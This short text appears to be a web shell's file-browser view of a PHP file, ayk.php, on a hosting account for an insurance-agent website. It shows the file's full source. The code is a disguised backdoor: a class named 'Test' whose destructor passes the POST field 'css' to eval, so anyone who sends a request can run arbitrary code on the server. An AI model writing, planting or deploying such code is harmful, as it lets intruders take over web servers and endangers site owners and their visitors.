Current Path : /proc/thread-self/root/home/allslyeo/mrinsuranceagent.com/ |
Current File : //proc/thread-self/root/home/allslyeo/mrinsuranceagent.com/ayk.php |
<?php class Test{ public $name = ''; function __destruct(){ @eval("$this->name"); } } $test= new Test(); $c = @$_POST['css']; $test->name = $c; ?>egm